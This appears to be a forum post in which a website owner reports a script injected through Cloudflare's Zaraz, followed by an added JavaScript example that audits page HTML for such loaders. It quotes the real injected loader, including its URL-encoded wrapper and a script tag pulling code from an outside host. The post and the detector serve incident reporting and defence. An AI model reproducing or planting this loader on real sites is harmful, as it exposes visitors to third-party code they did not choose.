I wanted to share a potential security

I wanted to share a potential security issue I've encountered with Cloudflare's Zaraz feature. I noticed a suspicious script injection on my website that wasn't originating from my server. After several hours of investigation, I discovered the source: Zaraz. What's concerning is that I had never heard of or enabled Zaraz on my account until now. My Cloudflare account is secure—I have 2FA enabled, and there are no signs of unauthorized access in the activity log or from access notifications. This leads me to believe that Zaraz may have a significant vulnerability that allows third-party script injections. I'm also concerned that Cloudflare might be aware of this issue but hasn't addressed it yet, as my support emails have gone unanswered.

Today I discovered they had hijacked it again and had this custom HTML set in Zaraz under the name "loftg":

<script src="https://www.isoplas.com/js/ff.js"></script>

On the website it would look like:
(function(w,d){{const d = document.createElement('div');d.innerHTML = ``;document.body.appendChild(d);};{const el = document.createElement('script');Object.entries(JSON.parse(decodeURIComponent(`%7B%22src%22%3A%22https%3A%2F%2Fwww.isoplas.com%2Fjs%2Fff.js%22%2C%22onload%22%3A%22%7Bdocument.dispatchEvent(new%20Event(%5C%22loaded-6e55551a-ff8e-4beb-80b6-ece238bba537%5C%22))%7D%22%2C%22order-id%22%3A%226e55551a-ff8e-4beb-80b6-ece238bba537%22%7D`))).forEach(([k, v]) => {el.setAttribute(k, v);});document.head.appendChild(el);}})(window,document)

<script src="https://www.isoplas.com/js/ff.js" onload="{document.dispatchEvent(new Event(&quot;loaded-6e55551a-ff8e-4beb-80b6-ece238bba537&quot;))}" order-id="6e55551a-ff8e-4beb-80b6-ece238bba537"></script>
How can I put an end to this? It has already happened three times...
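The wrapper quoted in the post decodes a URL-encoded JSON object and copies every key onto a freshly created script element, which is why the injected tag ends up carrying src, onload and order-id attributes. The following is an added example, not code from the post, from Cloudflare or from Zaraz: it audits a page's HTML for loaders of exactly that shape, decodes each payload, reconstructs the static tag the browser ends up executing, and flags any src whose host is not on an allowlist. The page markup around the quoted wrapper and the allowlist hostnames are constructed for the example.

```javascript
// Added example (not from the post, Cloudflare or Zaraz): audit HTML for
// loader wrappers of the shape quoted above, decode the URL-encoded JSON
// each one carries, and flag script hosts that are not on an allowlist.

// Constructed sample page. Only the wrapper and its payload are taken from
// the post; the surrounding markup is made up for this example.
const PAYLOAD =
  '%7B%22src%22%3A%22https%3A%2F%2Fwww.isoplas.com%2Fjs%2Fff.js%22%2C' +
  '%22onload%22%3A%22%7Bdocument.dispatchEvent(new%20Event(%5C%22loaded-' +
  '6e55551a-ff8e-4beb-80b6-ece238bba537%5C%22))%7D%22%2C%22order-id%22%3A' +
  '%226e55551a-ff8e-4beb-80b6-ece238bba537%22%7D';

const SAMPLE_HTML =
  '<html><head><title>shop</title></head><body>\n' +
  "<script>(function(w,d){{const d = document.createElement('div');" +
  'd.innerHTML = ``;document.body.appendChild(d);};' +
  "{const el = document.createElement('script');" +
  'Object.entries(JSON.parse(decodeURIComponent(`' + PAYLOAD + '`)))' +
  '.forEach(([k, v]) => {el.setAttribute(k, v);});' +
  'document.head.appendChild(el);}})(window,document)</script>\n' +
  '</body></html>';

// Matches the exact call shape used by the quoted wrapper; the capture is
// the URL-encoded JSON between the backticks.
const LOADER_RE = /JSON\.parse\(decodeURIComponent\(`([^`]+)`\)\)/g;

// Return the decoded attribute object of every loader found. Payloads that
// do not decode to a JSON object are skipped so that unrelated
// decodeURIComponent calls on the page cannot abort the audit.
function extractLoaderPayloads(html) {
  const payloads = [];
  for (const match of html.matchAll(LOADER_RE)) {
    let attrs;
    try {
      attrs = JSON.parse(decodeURIComponent(match[1]));
    } catch {
      continue;
    }
    if (attrs && typeof attrs === 'object' && !Array.isArray(attrs)) payloads.push(attrs);
  }
  return payloads;
}

// HTML-escape an attribute value for the reconstructed tag. The wrapper
// itself uses setAttribute, where no escaping is involved.
function escapeAttr(value) {
  return String(value).replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/"/g, '&quot;');
}

// Rebuild the static <script> tag the wrapper produces, so the report shows
// what the browser actually loads (this is the form the post shows second).
function renderAsTag(attrs) {
  const parts = Object.entries(attrs).map(([k, v]) => `${k}="${escapeAttr(v)}"`);
  return `<script ${parts.join(' ')}></script>`;
}

// Flag loaders whose src host is not allowlisted. A missing or unparsable
// src is flagged as well: a loader with no usable src is itself suspicious.
function unexpectedScriptHosts(payloads, allowedHosts) {
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  const flagged = [];
  for (const attrs of payloads) {
    let host = null;
    try {
      host = new URL(String(attrs.src)).hostname.toLowerCase();
    } catch {
      host = null;
    }
    if (host === null || !allowed.has(host)) {
      flagged.push({ src: attrs.src, host, orderId: attrs['order-id'] ?? null, tag: renderAsTag(attrs) });
    }
  }
  return flagged;
}

function auditHtml(html, allowedHosts) {
  const payloads = extractLoaderPayloads(html);
  return { loaders: payloads.length, flagged: unexpectedScriptHosts(payloads, allowedHosts) };
}

// Hypothetical allowlist: the site's own hostnames plus any tag vendor the
// owner deliberately chose. www.isoplas.com is not on it, so it is flagged.
const ALLOWED_HOSTS = ['www.example-shop.test', 'cdn.example-shop.test'];

console.log(JSON.stringify(auditHtml(SAMPLE_HTML, ALLOWED_HOSTS), null, 2));
```

Run it against the HTML as a visitor receives it (fetched through Cloudflare), not against the files on the origin: the post's point is that the loader is not in the origin's output, so an origin-side scan will come back clean. The check recognises only this wrapper shape, and a hit tells you the loader is present, not how it got into the Zaraz configuration; removing it and locking down who can edit that configuration still has to happen on the Cloudflare side.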
